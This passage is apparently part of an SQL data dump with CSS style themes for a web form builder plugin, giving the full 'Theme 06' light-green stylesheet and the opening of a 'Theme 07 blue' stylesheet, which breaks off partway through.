(23, 'Theme 06 transparent (light green button)', '.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #FFFFFF;\r\nborder: 1px solid #90EE90;\r\nmargin-bottom: 10px;\r\ncolor: #90EE90;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #473C34;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #6BD86B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #459B45;\r\n}\r\n\r\n.next-page div.wdform-page-button:hover {\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #90EE90;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.previous-page div.wdform-page-button:before {\r\n	content: " ";\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left;\r\n	height: 19px;\r\n	width: 20px;\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	top: -2px;\r\n	position: relative;\r\n}\r\n.button-submit {\r\ncolor: #473C34;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 35px;\r\nline-height: 35px;\r\nbackground: #6BD86B;\r\npadding: 0px 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder: 1px solid #459B45;\r\n}\r\n.button-submit:hover {\r\n	background: #90EE90;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #6BD86B ;\r\n	color: #030303;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #6BD86B ;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #6BD86B  ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #6BD86B ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #6BD86B ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #342114;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #90EE90;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #342114;\r\n	cursor: pointer;\r\n	background-color: #6BD86B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #72DB72 ;\r\n	background: -moz-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #8FEB8F ), color-stop(39%, #5CF35C ), color-stop(100%, #72DB72 ));\r\n	background: -o-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\nbackground: -ms-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\nbackground: -webkit-linear-gradient(left, #8FEB8F 0%, #5CF35C 39%, #72DB72 100%);\r\n\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\nbackground-color: #E0E0E0;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #473C34;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}', 0),
(24, 'Theme 07 blue', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #0072A2;\r\nmargin-bottom: 10px;\r\ncolor: #0072A2;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #A4A4A4;\r\n	border: 1px solid #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F1F1F1 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #696969;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #0072A2 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F1F1F1;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/07/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/next.png) no-repeat right #0072A2;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/07/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border-right: 1px solid #CECECE;\r\n} \r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #0072A2;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: 